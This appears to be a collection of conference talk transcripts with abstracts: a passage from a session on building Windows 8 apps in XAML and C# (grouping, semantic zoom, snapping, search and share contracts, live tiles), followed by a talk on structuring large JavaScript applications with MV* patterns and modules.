Twitter or through mail, he will probably have a Facebook app or a Twitter app or a mail app. So I can just leverage that instead of writing it myself. It's actually a pretty nifty way of applications working together. And it's quite easy to do. I will show you how it's done.
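On the share-source side this is little more than handling one event on the DataTransferManager. A hedged C# sketch of what it could look like in the page's code-behind; the page class name, the product values and the strings are made up for illustration, not the speaker's actual demo code:

```csharp
using System;
using Windows.ApplicationModel.DataTransfer;

public sealed partial class ItemDetailPage // hypothetical page name
{
    private void RegisterForSharing()
    {
        // Tell Windows: when the user opens the Share charm while this page
        // is active, ask me for the data to share.
        DataTransferManager.GetForCurrentView().DataRequested += OnDataRequested;
    }

    private void OnDataRequested(DataTransferManager sender, DataRequestedEventArgs args)
    {
        var data = args.Request.Data;
        data.Properties.Title = "Gold credit card";                    // assumed sample values
        data.Properties.Description = "Shared from the Woodgrove catalog";
        data.SetText("Have a look at this Woodgrove banking product.");
        // The share target app chosen by the user takes over from here.
    }
}
```

The source app never needs to know which share targets are installed; target apps declare themselves in their own manifests and Windows does the matchmaking.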
And it makes it very easy to have extra functionality in your app without having to really write a lot of code. Okay. So I think I more or less went through all I wanted to say here. There's more, of course, but can't show everything. So let's go to the first part and that's laying out and grouping data. Well, I told you there are a few controls in Windows Store applications built in, which enable you to show your data nicely. There's actually three, three big ones, and they all inherited from this few base. So they all have more or less the same base functionality. That's a list view. The first one you see here, as you can see that it's typically for vertical scrolling. That's the one you saw when I snapped my application. That was a list view. Then there's the grid view. That's for the horizontal scrolling. And the third one here is the flip view. And the flip view is what you get when you want to start showing your data one by one so the user can just flip through a bunch of photos, for example. Now both list view and grid view support grouping out of the box, which is exactly what I'm going to show you. But you might wonder if you come from WPF or Silverlight, well, where's my list box? Why is this all of a sudden a list view, not a list box? Well, the list box is still in there as well. And you can still use it, but I would advise you not to because the list view is more optimized for touch. It has bigger margins and padding out of the box. It actually supports a few extra events. You can subscribe to touch enabled events. So if you can, I'd advise you to use the new controls and not the old ones, even though the old ones you're used to from WPF are still there. Right. So let's have a look at that. And I'm going to be in code for a while now. I'm just going to show you how a few things are done. Can everyone read this or should I put it a bit bigger? It's okay? Yeah. Okay. Good. Let me quickly start by explaining how the application is set up. It's actually a very, very simple one. I have a service layer, which I reused from another project demo. That's actually one simple WCF service with entity model behind it going through a database, of course. What does this service contain? I'm just quickly going to show you to see what's happening, but it's not that important in this case. Service actually just contains a few methods to get the categories, to get the image, and to get the images related to the category. And these two I don't even use. So mainly what we're going to use is the get categories methods, and this method will give me back a bunch of categories, and for each category a bunch of child items. So that's pretty common, very simple service layer. So that's where my Windows Store application gets its data from. The notification extensions project here, that's from the Windows Store SDK. I'll talk about that later on. It's to make it a bit easier to work with live tiles, but that's for later in the session. So the important one here is my would-growth.client. That's a Windows Store application. You get that file new Windows Store application template. And as most XAML applications, this consists of a bunch of views, which are the things you've already seen. The products group page was my main page, product category, by category, and detail, well, that's the detail page of one banking product. 
So it consists of a bunch of views, which contain my XAML code to describe my UI, and a bunch of few models, which are responsible for translating my model into properties my UI can bind to, more or less. That's all pretty basic. I'm guessing most of you will know about this. So let's immediately go into Windows 8 specifics. So first thing, I should probably show you is how did I get my data in my application? Well, that is logically, in this case, going to be in the ViewModel. So let me quickly show you. It's a very, very easy one, probably not the best programming principles applied here. So what's happening here? I've added a service reference to my catalog service, and I call the getCategories method, which will return me a bunch of categories with their child items in there. Now, this is pretty regular code for most of you, I think. Were it not for the whole async await thingy? Is that anyone know that? Yes, in co-awaits? Yeah, I see some of you do, some of you don't. There's a lot to say about this. And, well, I have a session tomorrow in which I'm going to tell you a few things more about that. For now, it's probably most important to know that this await keyword, this actually tells my compiler to stop with the method execution until this async method has returned from the server with its data. So what you used to write would be proxy client.getCategories async or getCategories, and you would typically have a completed event handler on your proxy client for the return of this method. And in the completed event handler, you would get your categories back. Well, this await keyword actually ensures that the execution of my method is awaited until this async call has been executed and is back. So it's actually pretty nice because that means at the same time other threads might run, another code can run, this does not block your application anymore. And what does the async keyword here mean? Well, it actually just means that my method can contain, can be awaited, can contain code that awaits other methods. So with that out of the way, we now know that the getCategoriesAsyncMethod will return me a bunch of categories which in turn contain all these banking products. And then I simply take that list, I order them by title, and I put them in an observable collection of catalog category. These observable collection grouped and ordered categories is then made available as a property on my view model so I can bind to this in my view. Okay, so far so good. This is actually an already grouped list. I get a bunch of categories back with a bunch of items in them so they're already grouped by category. So we know how our data gets to our application. Now, how is this shown in the old example? Let's look at that. So logically I should find grouped and ordered collection somewhere in this. Let's first have a look at the grid view itself. So the grid view, that's what showing my horizontal items. And ignore the semantic zooming thing for now. We'll look into this. As you can see here, this grid view somehow gets its data from something called the grouped items view source. Okay, so we're not there yet. That means I must somewhere have a collection view source named grouped items view source on my page. And that's more or less where a part of the magic already starts to happen. Because I have just declared a collection view source on my example page named grouped items view source. So that's what's used on my grid view. So now we know that. 
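For reference, the view model side just described, loading the categories with async/await into an observable collection, might look roughly like this in C#. The type and member names (CatalogServiceClient, CatalogCategory, GroupedAndOrderedCategories) are assumptions based on the talk, not the actual sample code:

```csharp
using System.Collections.ObjectModel;
using System.Linq;
using System.Threading.Tasks;

public class ProductsGroupViewModel
{
    // The page's CollectionViewSource binds its Source to this property.
    public ObservableCollection<CatalogCategory> GroupedAndOrderedCategories { get; private set; }

    public ProductsGroupViewModel()
    {
        GroupedAndOrderedCategories = new ObservableCollection<CatalogCategory>();
    }

    public async Task LoadAsync()
    {
        var proxy = new CatalogServiceClient(); // assumed WCF service reference name

        // await: the rest of this method resumes once the service call has
        // returned its data, without blocking the UI thread in the meantime.
        var categories = await proxy.GetCategoriesAsync();

        foreach (var category in categories.OrderBy(c => c.Title))
        {
            GroupedAndOrderedCategories.Add(category);
        }
    }
}
```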
And here we find the grouped and ordered categories property from my view model. So somehow this collection view source gets its data from the view model. Collection view source, you can see that as a view over my data. So I have my data coming back from my service and the collection view source offers me a view over this data, which can be filtered and sorted by the way. But the thing why I use it here is because it can also be grouped. And that's one of the nice things. As I said, the grid view supports grouping out of the box. And how does it support that? Well, if you bind it to a collection view source, you can state on that collection view source that it is grouped simply by setting the is source group property to true. And by telling it where it can find the child items. So in short, what does this code mean? This code means that there's a collection view source named grouped items view source, which contains six categories grouped by category in this case. And it can find the child items in catalog products. So just by stating this little bit of code, my grid view will automatically group these items. So I actually thought that was a pretty easy way to get grouping in your application. Now, as far as the rest is concerned, that's pretty much standard example. Of course, I have to declare how my, let's see, let's start with this one. I have to declare how one product will look like. So in this case, we have an image, which is what you've already seen. And it's overlaid with a nice looking background with a title and description. So that's one of the products you see here. And then, of course, I have to declare the group template as well. So this is one item template. Now I have to declare how a group template looks. And that's even easier because that's simply the title of my catalog category. And the Chevron glyph here, that's the nice arrow. So this here gives me this. And the thing I just showed you, that's one of these items. Okay. Of course, all these properties, these are effectively properties of what I get back from my service. My category has title. But I'm guessing that's probably obvious. Okay. So now we already have a nicely grouped grid view. And we know how we get our data in our application. So the next thing on the list was the semantic zooming. So zooming out of this grid view. And I think the code on screen kind of gives it away already. Because I have just put a semantic zoom control built into Windows Store framework around my grid view. And in the zoomed in view, I have put the grid view I've just shown you. And in the zoomed out view, there's another grid view, which I will immediately show you. Now this is all that it's, this is effectively all that is needed to enable zooming in and out. Just put a semantic zoom control around your grid view. Now of course, I somehow have to declare how one of these items in the grid view when zoomed out looks like and where it gets its data from. So that's where the zoomed out view comes into play. So that's this one. I somehow need to say, well, where do you get this data from? And as we can see, it's a grid view. It looks a lot like the previous one. I simply have a template for one of the items. But the thing that is missing here, I don't know if you see it, but there's the item sources in set. So this is a grid view. If you look at it like this, that doesn't know where its items come from. And the second thing that's a bit weird is that all of a sudden I have a group property. I don't have any group property. 
I have an image. I have a title. I have a description. But there's no group property in my data object. So one, how do we get the data? And two, where does this group property come from? Well, let's have a look at that. This is actually all that's needed for this. Again, this is why I'm using the collection view source. So what I do here is I find my collection view source on my page, which is, as I've shown you, the grouped items view source. I find the current view of it, which is my grouped view. And then I go to the property collection groups. And this collection groups property, well, that simply contains the groups from my underlying data. So the collection groups, that will contain my categories. The only thing I have to do then is to make sure that my zoomed out view gets the correct item source. So I simply take the zoomed out view, cast it to a list view base. As I said before, grid view inherits from list view base. And I set its item source to the groups from my collection view source. And immediately, that is also where the group property comes from. So the group property you see here, this one, that's implicit. You get that when you use the collection view source's groups property. And as far as all the rest is concerned, so the automatic snapping to the correct part of your page, like this, housing loan, ghost loan, credit cards, I'm automatically back at the credit cards part of my grid view. You get that for free. So you just get that out of the box by writing the code I just showed you. So there's no need to catch any events for that or anything. Okay. Next up, snapping. So as I quickly talked about, your app, your Windows Store application, should support snapping if you want it to be able to pass Windows Store certification. So if you want your app to be in the Windows Store, it should support snapping. There's another mode as well, and that's portrait mode. It's what you get when you turn your screen around. Your app doesn't have to support that one. I'm just saying it gives a nice extra, but you're not obliged to do that. Now, how can you say that you want to support one mode or the other? Well, each Windows Store application also has an app manifest file. We'll get back to that later on, but I'm going to show you already. Because in this app manifest file, here you can say which rotations are supported. I haven't checked any of them, so I support all. But if you do not want to support portrait mode or you do not want to support a certain flipped mode, you can simply check only the ones you want to support. Okay, but snapping must be supported. And they're a bit related here. Because how do you... Well, there's actually two things we need. One, how does my application know how to snap? And two, where do I define how it looks when my application is snapped? The first one is the easy one. So, let me just stop this and go into the code. So, if you've worked with XAML... Oh. XAML... Ah, there we go. If you've worked with XAML, you know about something called the visual state manager. That's typically used to go to the different states of a certain control. For example, if you have a button, this button will use its visual state manager instance to go to hover state or to go to clicked state. Now, the same goes for all my views. So, on each of these views, I have a visual state manager. And this visual state manager, let's have a look at it. This is the one that takes care of ensuring the right controls are shown in the right mode. So, that's what we'll immediately look into.
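The zoomed-out wiring described above, written out as a small code-behind sketch. The element names (semanticZoom, groupedItemsViewSource, GroupedItemsPage) are assumptions; the parts the talk relies on are CollectionGroups and the cast to ListViewBase:

```csharp
using Windows.UI.Xaml.Controls;
using Windows.UI.Xaml.Data;
using Windows.UI.Xaml.Navigation;

public sealed partial class GroupedItemsPage : Page
{
    protected override void OnNavigatedTo(NavigationEventArgs e)
    {
        base.OnNavigatedTo(e);

        // The CollectionViewSource declared in the page resources.
        var groupedItems = (CollectionViewSource)this.Resources["groupedItemsViewSource"];

        // CollectionGroups exposes the groups (the categories) of the underlying data.
        // GridView inherits from ListViewBase, so the cast works for the zoomed-out GridView.
        var zoomedOutView = (ListViewBase)semanticZoom.ZoomedOutView;
        zoomedOutView.ItemsSource = groupedItems.View.CollectionGroups;
    }
}
```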
First thing I still need to tell you is how does my application know when it's snapped? And that's really very easy because it doesn't require any code on your behalf. You just need to make sure that the base page you're inheriting from — so this is my view, the products group page — is a layout aware page. When you make a new Windows Store application, that class is included. So, that layout aware page, that's a base class, and that will take care of triggering the visual state manager. So, no code for that. So, the only thing that's left is showing you how I can enable or disable certain parts of my user interface when we go to another mode. What I'm going to look into is called the snapped state. So, let's have a look at what happens here. Well, apparently in this visual state, a storyboard is defined. And that storyboard will change the back button, the button on the top left, to a snapped back button style. It will change the page title to a snapped page header text style. These are actually just the same button but a bit smaller, the same text but a bit smaller. And it is going to look for an item list view and set its visibility to visible. And it's going to look for the item grid view and set that one's visibility to collapsed. So, this is actually all that happens. I define a storyboard containing a few animations. And these animations will take certain parts of my user interface and make them visible or invisible, change their styles or do other things with them. This, of course, means that my item grid view, which is, well, this one, the one that shows all the horizontal stuff, is effectively replaced by a list view named item list view. And that's this one. What is this list view? That's the one you see on the left when I snap. And the nice thing here is that it is bound to exactly the same data. So, as far as code behind or code in your view model is concerned, that typically doesn't require extra code. It's typically bound to the exact same items as your grid view is bound to, except that it's showing your data vertically instead of horizontally. Sometimes a bit less data as well. But supporting snapped mode is more a matter of changing some XAML around in your view than changing code behind or C sharp code. So, that's all that happens, actually. My list view is made visible. My item grid view is made collapsed. You might wonder, by the way, doesn't this have an impact on performance, et cetera? Well, if a control is collapsed in XAML, it's effectively not rendered. So, there's no code executed for it or whatever. Do watch out, because if you just put the opacity to zero, which also makes it invisible, then all the events will still fire and it is still rendered. So, just use collapsed and it should not have any performance impact. Okay. So, I told you I was going to skip a few slides and just tell it in code, which is exactly what I did. But I do want to say a few things about navigation. There are two modes of navigation I already talked about a bit. Let's look at that in a bit more detail. There's hierarchical navigation. It's very common, also on web pages. Typically, you would have a hub page, the main entry page of your app. You click on that one, we call that a section page, and you click one level deeper, and you call that a detailed page. Why do I want to show you this?
Simply to be able to say that, again, these are guidelines, but it is a good idea not to hide pages deeper in your hierarchy than four levels. I don't know the studies anymore, but there's been a bunch of studies on that and the odds of you effectively using that page or finding that page, if it's very deeper than four levels, are probably not worth the development costs of it. That's really important to know. Then, of course, there's the flat navigation, which is effectively done by the navigation bar on top. You just tap on and you go to another part of your app. Obviously, both are used in most applications. Maybe I should show you how this is done. Let's have a look at that. There's not a lot of code to that either. I have a feeling I'm kind of repeating myself that there's not a lot of code to that, but that's because introduction really is quite easy to get started with something like this. Let's have a look at the navigation bar on top. First, how do I define that one? Every view has a page.topAppBar property. You can simply set that to one of your own controls. In my case, I am setting that to something named the navigation bar. Why do I do this? Well, because I can easily reuse this navigation bar control on each page. The navigation bar, I have to look that one up. It should be here. There we go, our navigation bar. What is this? It's a type app bar, maybe a bit important. It simply contains my one button, which you've already seen, the big home button. When I click that one, I simply use the application's rootframe to navigate to another page. This is a bit different from what you might be used to, because instead of accepting a string, the navigate method effectively accepts a type. You use type of products group page, which is my view. Yes, you can pass in parameters if you want. Just the next parameter in this method will allow you to pass in data to another view. That's effectively how you navigate. There's not a lot more to it. In the page you navigate to, you will have unnavigated to and unnavigating from methods, which is where you end up in once a user goes to that page. You can catch that event or subscribe to that event to do whatever you need to do when a user navigates to a certain page. So this was a navigation bar, but that's kind of like related to the command bar. As I've said, command should typically go into the command bar. Now, how do you get a command bar? Where do you put that one? Well, let's have a look. If you remember, maybe I should start it up again. If you remember, I had a dummy command bar button on one of the detailed pages. Here, this pin button. Somehow this page has a command bar. Let's have a look at how this works. That's the details page. Let's make it a bigger. As you could have guessed, I guess, you don't only have a top-abar property on your page, you also have a bottom-abar property on your page. In this case, I define the application bar on the page itself because, well, command bars typically differ from page to page. You can also reuse another one of your own controls. Typically, the commands are page sensitive, so create it like this. You can, of course, depending on whether or not the user has selected something on that page, you can see these are simple example controls. You can reference them. You can hide them. You can show them depending on when the user clicks something or selects something. The main thing here was command bar goes in the bottom-abar property. Now we come to the most interesting part. 
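As a hedged sketch, the navigation described here boils down to something like the following. ProductsGroupPage is the page type mentioned in the talk; the click handler name and the string parameter are just illustrations:

```csharp
private void HomeButton_Click(object sender, RoutedEventArgs e)
{
    // The application's root frame; Navigate takes the *type* of the target page,
    // plus an optional parameter you can pick up on the other side.
    var rootFrame = (Frame)Window.Current.Content;
    rootFrame.Navigate(typeof(ProductsGroupPage), "credit-cards");
}

// In the target page:
protected override void OnNavigatedTo(NavigationEventArgs e)
{
    var parameter = e.Parameter; // whatever was passed to Navigate, if anything
    base.OnNavigatedTo(e);
}
```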
This is the searching and the contracts and the sharing. I definitely wanted to get that in this session because it's something that really makes Windows Store applications stand apart from other systems I have seen. That is effectively using the Windows system as a go between your app and other applications. Let's start with searching. As I said, you can make your application searchable from anywhere in Windows, even from inside other applications, or at least that's how it looks. That means that we somehow need to be able to tell Windows that my application is searchable. That's the first thing. How do I do that? Well, back to that application manifest file I just showed you. There's a declaration step here. In that declaration step, you can say what your application supports or what it should support. As you can see, lots of stuff to do, lots of stuff your application can do. In our case, it's of course the searching that's important. I simply added a search declaration. You don't effectively have to fill in any of these things unless you want to override the defaults. I'm just simply using the defaults. This is literally everything you need to do to ensure that your application will end up in the list of searchable applications. End up in this list. Now, okay, easy enough. How do you really search now? I mean, I've just told Windows I can search. I can be searched, but I haven't written any code yet for effectively searching. Well, the main entry point of our application, the app.xaml, contains a bunch of methods you can override. One of the methods you can override, that's the one that will be executed, and that's the way your application will be started when a user starts searching from anywhere in Windows. So let's look at that one. That's in the app.xaml. Let me find it. Let's do it like this. There we go. So what I've done here, let's make it a bit bigger. I state when my window is created, so this is when the application starts up. The application window is created. I look for the search pane. Search pane.getforcurrentview. You can get that from anywhere, by the way. And I state, well, handle the query submitted event. And when a query is submitted, execute the onqueriesubmitted method, which is this one. So once a user starts searching your application, when your application is already active, this is, by the way, once a user starts searching in your application and your application is active, this is where you'll end up in the onqueriesubmitted method, which contains a bunch of arguments. And the important argument here, let's see, oops, probably better stop. That's the query text argument. So this query text argument, that is what contains search term your user pushed in in the search pane. And after that, I just, I have everything in my application that I need to get from the window system. I know the user wanted to search and I know what he wanted to search for. All the rest is just your own code or my own code. In this case, I simply navigate to the search results page and I'm sending a message. It's using an MVVM light, by the way. I'm just sending a message that it needs to search, which will in turn go to my service layer, search and return me the results. The important part here is that you end up in the onqueriesubmitted method and you get through your arguments the text you wanted to search for. Now, I specifically said this is where you end up in when your application is active, when your application is running. 
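A sketch of the running-app search path just described. The handler and page names are assumptions; the SearchPane API and the QueryText property are the pieces the talk relies on:

```csharp
using Windows.ApplicationModel.Search;

// In App.xaml.cs: hook the event once, when the window is created.
protected override void OnWindowCreated(WindowCreatedEventArgs args)
{
    SearchPane.GetForCurrentView().QuerySubmitted += OnQuerySubmitted;
    base.OnWindowCreated(args);
}

private void OnQuerySubmitted(SearchPane sender, SearchPaneQuerySubmittedEventArgs args)
{
    // args.QueryText is what the user typed into the search charm.
    var rootFrame = (Frame)Window.Current.Content;
    rootFrame.Navigate(typeof(SearchResultsPage), args.QueryText);
}
```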
There's another way to end up in an application when user starts searching. And that is if your application isn't running. That can happen as well. I'm in another application and I want to search a banking product and I use my application to search for it. Well, then of course, I haven't gone through the onwindow created method and I don't have an event handler here because my application isn't running. My application hasn't even started yet, maybe. Where do I end up in then? I end up in the onsearch activated method. Windows will start my application and will execute the onsearch activated method, after which I can continue just as I did before. What I have to do here is all the code I use to normally start my application up, I create a frame, I go to the correct view. And after that, again, I send a message to refresh my search which contains the query text user typed in. That's probably the most important part here. Your user can activate your application which isn't even running yet through the search pane and then you'll end up here. So you have to handle that differently than when the application is already active. Right, that's one way. So that's one way of a search contract in which you say to Windows, I can be searched. So you might remember there's another way and that's the exact other way around being the sharing. So my application is active and I'm sending some data to another application to handle. That works a bit differently. In this case, I do not have to say to Windows that I can handle data from another application. So I don't need to add that in my manifest file. I just need to write a bit of code that will send the data from my application to whatever application that can handle it. So in fact, I'm sending it to Windows. And there's one pretty nice slide on this that shows you how this works. So the first thing I do, source application, that's me, I need to register with the data transfer manager. Again, this is an object you can access from anywhere in your Windows Store application, just like the search pane. I register with the data transfer manager and at a certain point, the user selects to share charm. So what happens then is me, as the active application, gets an event. An event is triggered. And that event is triggered. I go to the event handler and in that event handler, I have to create the package of data that will be shared. In my case, the banking product, some explanation about product and an image if I'm correct. So I have to create a data package. Data packages can have multiple formats, can be URIs, bitmaps, combinations, texts, even your own types if you only wish to share between your own company's applications. So I'm actually going to receive this event. I'm going to fill the data package. And after that, my call is completed and I'm actually done as far as my application is concerned. To share broker, which is a part of Windows, takes over. And the share broker is going to look for applications that can handle it. The user then selects something and automatically that application is activated. And the code in that other application is executed, which will handle the sharing of my package of data. So as you can see here, as far as our app is concerned, the only thing that needs to happen is that on the left. If you're a shared target, it's more or less the same as it was with searching. So you have events, you can override, methods, you can override in your app.xaml.cs. Okay, so that's the other way around. Let's see how that works. 
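And the cold-start path, where Windows launches the app because the user searched it while it wasn't running, looks roughly like this. The real template code also checks whether a frame already exists; this sketch skips that:

```csharp
protected override void OnSearchActivated(SearchActivatedEventArgs args)
{
    // Do the normal startup work first: create the frame and activate the window.
    var rootFrame = new Frame();
    Window.Current.Content = rootFrame;
    Window.Current.Activate();

    // Then hand the query text over to the search results page.
    rootFrame.Navigate(typeof(SearchResultsPage), args.QueryText);
}
```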
Let's go to the details page. That's where I put it. That's where I've shown it to you. So first thing we needed to do, and that's this here, I do this when I navigate to my page. I need to get the current data transfer manager, which is just the same as the search page. So get for current view, you'll get the current live data manager in your application. And I handle the data requested event. So I say, well, once a user clicks share, this is the event that will be executed. And share data requested is the method I will use to handle it. Let's go to that one. There we go. And the important thing here is filling that data package. What is that data package? Well, that's actually just the event arguments that contain a request property, which contains a data property. And in this data property, you fill in all the things you want to share. In my case, I give it title, a description, and I pass in an image. And after that, this method is done. And Windows takes over again. And this data package I have just created is sent to the other application. I do not get notified of this anymore, by the way. So there's no way to handle a share, okay, or whatever. Because it's now the responsibility of the other application, not my application anymore. Okay. So that's sharing. And there's one more thing I'd like to show you, and that's live tiles. As you can see on the start screen, these are all just make your application quite vivid, the tiles on my start screen here. It's always nice to have your application have one as well. This is the one from my application, Woodgrove Banking. And it doesn't just show the logo from the application. It actually shows me the gold credit card I've been using all along. So how do we create a live tile? Well, that's where the notification extensions come into play. To create a live tile, what you actually have to do is create a bunch of XML and use a tile update manager to send that to your Windows system, which will then show it as a live tile. To help us with that, so to ensure we do not have to create all the XML ourselves, I use notification extensions, which is actually just a wrapper around all that XML. So we now have nice class we can work with. So let's see how we do that. Let's go to the right one. I think I put it here. Yeah, create random tile method. So what do I do? I get the first one of my products I just fetched from my service. That's what I do here. And then I use the classes from my notification extensions to create a tile.
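For the share-source side described above, a hedged sketch of the two pieces — registering for the event and filling the data package — might look like this; currentProduct is a stand-in for whatever the details page is showing:

```csharp
using System;
using Windows.ApplicationModel.DataTransfer;
using Windows.Storage.Streams;

protected override void OnNavigatedTo(NavigationEventArgs e)
{
    DataTransferManager.GetForCurrentView().DataRequested += ShareDataRequested;
    base.OnNavigatedTo(e);
}

private void ShareDataRequested(DataTransferManager sender, DataRequestedEventArgs args)
{
    // Fill the data package; after this method returns, the share broker takes over.
    var data = args.Request.Data;
    data.Properties.Title = currentProduct.Title;
    data.Properties.Description = currentProduct.Description;
    data.SetText(currentProduct.Description);
    data.SetBitmap(RandomAccessStreamReference.CreateFromUri(new Uri(currentProduct.ImageUri)));
}
```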
|
As you might have read somewhere, Windows 8 = Windows, re-imagined. Building applications for Windows 8 comes with a staggering amount of new possibilities, and in this session you'll learn all about it. We'll check out what you need to know to start developing Windows 8 apps using XAML & C#, and dive into snapping, contracts, charms, app bars, live tiles, and more. After this session, you'll leave with a newfound understanding of what can be achieved with Windows 8 development, and you'll be ready to start building your own killer app for Windows 8.
|
10.5446/51462 (DOI)
|
Yes, should we get started? So today we're going to talk a little bit about patterns of large scale JavaScript applications. There's been a lot of cool stuff going on these last few years. So I want to talk a little bit about some of the things that I've experienced and learned. Hello, my name is Kim. I work at BEKK Consulting here in Oslo. And you can find more about me here. So we're going to talk about large JavaScript applications. But people tend to think that I'm talking about really large JavaScript applications when I say this. 20,000 lines of code or more. And it doesn't really have to be that way. All of these things that I'm talking about, the same concepts also apply to smaller applications. They can be a thousand lines of code. They can be a couple of thousand lines of code. And a lot of the patterns are still important to think about. So the main thing usually is that these are applications that need to live for a long time. And also applications that have unforeseen requirements. So most of this will apply to all of the JavaScript apps we write, at least for work. So the problem with JavaScript is that we tend to start out with something like this. It's a small feature. We send all the HTML from the server to the browser. And then we start creating a couple of small features. Five lines, 10 lines, 20 lines of code. And as the time goes by, we need more and more functionality. And then we suddenly have 5,000 lines of code in one file. And this happens all the time. I've been on several projects where this happened and it happens to everyone. I think this is a good term for it, jQuery soup. We get this brittle, tangled mess. And it's really hard to understand and hard to code in those apps. And maybe the worst thing is that it's hard to reason about the code. So that makes it difficult to create new features. So if you go back a couple of years to around 2006, we had unobtrusive JavaScript. We sent HTML to the browser and we used JavaScript to unobtrusively add functionality. So it worked without JavaScript and we added functionality with JavaScript. And that year we also got jQuery. So the browsers back then were IE6. IE7 came out in 2006. We had Firefox 2. And the state of the web was different back then. So jQuery was an amazing library. We really needed jQuery. The thing is that it's an amazing library for DOM manipulation. But we tend to follow a lot of anti-patterns when our apps grow. So we have things like coupling ourselves too much to the DOM. So when you change the HTML, you actually end up breaking your JavaScript. You put everything inside document ready. So whenever the code loads, it starts the entire thing and you have no way of testing it. And it's also hard to reuse. And also everything tends to end up in a jQuery plugin. Even the things that don't have anything to do with jQuery. And maybe the worst thing is that too often the business logic is just hidden inside this brittle, tangled mess of a code base. So if we just look at a reasonably simple example, we have a form here. And when you submit the form, we do an Ajax request. And on success on that request, we actually receive some... We get the data and we put it into the DOM. But the thing is that right here there's a lot of stuff going on. We have page events and user events and network I/O. We have network events. We do templating, parsing of the response and a lot of stuff. And we also get callback hell. We get these structures that just nest in and in and in.
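The kind of code being described looks roughly like this — renderResults is a made-up helper, and the point is the shape: user events, Ajax, parsing and DOM updates all tangled together inside document ready:

```javascript
$(function () {
    $('#search-form').submit(function (e) {
        e.preventDefault();
        $.ajax({
            url: '/search',
            data: $(this).serialize(),
            success: function (data) {
                // ...and the callbacks keep nesting from here.
                $('#results').html(renderResults(data));
            }
        });
    });
});
```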
So there's callbacks inside, callbacks inside, callbacks. And what happens then when we have this considerable increase in the amount of JavaScript? We have a lot of more interactive pages than before. And there's a lot of complexity just in the user interfaces. We could have something like the new Google Maps. So here we require JavaScript for anything to function at all. So we've come a long way. And what has happened is that we're pushing more and more stuff from the back end to the front end. So a lot of the stuff that we before did on the back end, we now do dynamically with JavaScript on the front end. And also we've got a lot of new capabilities in the browsers. There's still a browser war. There's still really pushing for new stuff into the browser. So you have geolocation, local storage, canvas, and a lot of other stuff. So this means that there's more and more complexity in your front end application. So the problem is no longer the browser itself and the capabilities you have there. It's the size and complexity of our applications. I saw a great talk about a year ago from Brandon Keepers who works at GitHub. He said that the litmus test for your application is that if your site breaks, when your JavaScript fails, you should treat it like a real language. And this is mainly what we're going to focus on, what it means to treat JavaScript as a real language. Because what we want is testable, scalable, and maintainable JavaScript. This is where we want to be. The problem, though, is that this is really difficult. It takes a lot of time to learn. I've been doing this full time for a couple of years, and we've had a really hard time to get there. We're starting to get there. So the problem is that we need to unlearn a lot of stuff, because we've coded JavaScript for 10 years, a lot of us, and we're used to doing it the jQuery way. And it's so easy to create brittle systems when we're using jQuery. But the first thing is that we need to unlearn our DOM-centric approach to creating websites. So the problem with the DOM is that it's this big blob of state. So you have this stateful and global object you're working with all the time. So this makes it really hard to maintain your codebase when your application grows, because you're working on this one blob of state. And it's also really hard to test. And debugging some of these applications can also be really hard, because there's usually a lot of stuff going on, and it depends on the state you're currently in. We also need to unlearn how we write JavaScript. We need to learn from how they do it on the back end, and we need to get away from 5,000 lines of code in a single file. We also need to watch out for globals, not just the DOM itself, but also globals in general. So basically, learn more from the back end. And we need to unlearn how we use jQuery. This is a great quote from growing object-oriented software guided by tests, which is an amazing book. They say that when your code is difficult to test, it's most likely because you need to improve your design. Justin Meyer, who created a JavaScript MVC library, said this, is that to build large applications, you need to never build large applications. You need to build small pieces and assemble those into your application. So we need to get away from these big files. And these last couple of years, we've started to get some help here. We've got a lot of new libraries, so we have things like knockouts and backbone, which are reasonably small. 
We also have things like Ember and AngularJS, which are more full-fledged frameworks. So they're trying to help solve the problem, and they have quite different philosophies, so we're going to try to understand some of the things that they do. Because right now, it's easy to feel overwhelmed by choice. It's a daunting task just to be able to choose one of them. I would have struggled with that if I was starting a new project right now. So the thing is that we need a foundation to discuss the features they have and how they do things, and also to understand the value they add and how you can solve it yourself without using a library or framework at all. So the most important thing is to get the state away from the DOM. This is the same for all of those libraries. They all want you to get the state away from the DOM. And one way of doing this is MVC. This is what most of those libraries are inspired by. So if we just look at these last few years, we have from 2005 here, and this is a Google search for JavaScript MVC, or the Google Trends. And we see that this is really growing. So the main thing here about MVC, I guess a lot of you are back-end developers, so you know what MVC is. But the main point here is that you want this clean separation between your data and the DOM. So the controller here is the thing that mediates input and manipulates the model. However, you won't see that cleanly applied in a lot of front-end JavaScript frameworks and libraries. There's a lot of variation there, so you often see this instead, Model-View-Star. And this is just because a lot of them have a different take on what that last part is. So the thing is you want to split your data and the DOM, and how you do it, I think you can call it that, is quite different from library to library. So you can have something like a Model-View-Presenter where all the presentation logic is pushed into the presenter. So now the view doesn't know about the model at all. It's the presenter that gives the view the data. You can have something like Model-View-ViewModel, where the view model is the one that exposes data to the view. So this is a quote from one of the core developers on AngularJS. He says that AngularJS is a Model-View-Whatever framework, where whatever stands for whatever works for you. They started out being mostly MVC and have gradually become more MVVM. But the thing is they also say this very clearly, that it is Model-View-Whatever. So the most important thing here is separating the state and the DOM. So this is the first step. We've already gotten somewhere. So just by thinking about this, it should be easier to work with JavaScript. MV-Star is not enough, though. Just having this pattern to follow still doesn't say a lot about how your code should look and how it should work. And there are a lot of things that you need to think about. For example, here, Joel Hooks wrote a great blog post about a month ago, where he talked about his experiences with AngularJS. And what he says is that when he started on this project, there were a lot of monolithic single files that contained too much code. So just following MV-Star itself is not enough. So he talked a lot about the importance of code organization and how important that was for actually getting an application that was easy to work with and where you can add features rapidly. And this is also a great quote by Jim Levin, who says that just how you split your code has an impact on the maintainability of the application.
So really what we want to do is have far more files and far less in the file size. So we want to get away from these 5,000 lines of code in a single file. It's better to have more files that are smaller, easier to work with. So you want more focused files. There's not enough just to split up. You need to think about how you do it. So there's two ways, for example, there are two ways we can think about this. We could package our code by feature or we could package it by layer. So if we look at this, is it large enough? So for example, if you package your code by feature, you could have a module like this, a module folder like this, where you have, you can see the high level scope of the application. So here we're working with BankID, we have some customer information and some other stuff. Or you could have package it by layer, so you have a modules, models folder, a collections folder, a views folder, a routers folder. So this is from a backbone project. So I prefer packaging by feature and I usually tend to call them modules. That was also the module name on the folder they were in. So a module is something like this. So here we see just the search bar on Facebook. That can be a module. So it's a bite-sized piece of your application. It could also be something like this, where we input the status. So it's still a small feature on Facebook itself. Or it could be something like this on the right side. So modules are the things that contain business logic. So this is mainly where you want to have all your business logic and all of the stuff that is special about your application. All the other stuff is usually mostly set up and reusable functions. So the modules should be small. They should try to solve one problem and should really try to relentlessly split into modules. Of course you shouldn't go for like 